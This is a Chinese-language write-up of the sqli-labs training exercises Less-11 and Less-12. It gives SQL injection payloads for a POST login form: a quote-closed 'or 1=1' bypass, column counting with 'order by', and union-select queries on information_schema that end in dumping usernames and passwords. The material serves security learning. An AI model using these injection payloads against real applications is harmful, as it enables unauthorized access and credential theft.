Less-11:
首先,进去页面之后发现是这样的
随便输入了一个之后发现报错
可以看出来这是用post方法传递的,我试了几次之后发现由单引号闭合,于是用命令admin’ or 1=1#,页面变化
可以看出来有两个显示位,用1=2令页面错误,使用admin’ or 1=2 order by 2#排序页面正常,admin’ or 1=2 order by 3#页面返回错误,所以有两个字段。接下来就可以愉快的用union select 联合查询了,sqli-labs解题大法1~10——Less1中有详细步骤,在这里就简单说一下吧。
(1).用select grouop_concat(schema_name) from information_schema.schemata可以查询所有数据库名。
(2).用select database()查询出当前数据库名。
(3).用select group_concat(table_name) from information_schema.tables where table_schema='db_name’可以查询出所有数据表名。
(4).用select group_concat(column_name) from information_schema.columns where table_name=‘table_name’ table_schema='db_name’可以查询出字段名。
(5).用select group_concat(username) from db_name.table_name,
select group_concat(password) from db_name.table_name,可以查询出所有用户名和密码了。
Less-12:
这个猜了好多次,最后发现是")闭合的,接下来用联合查询,具体过程参考Less-11。
Less-13: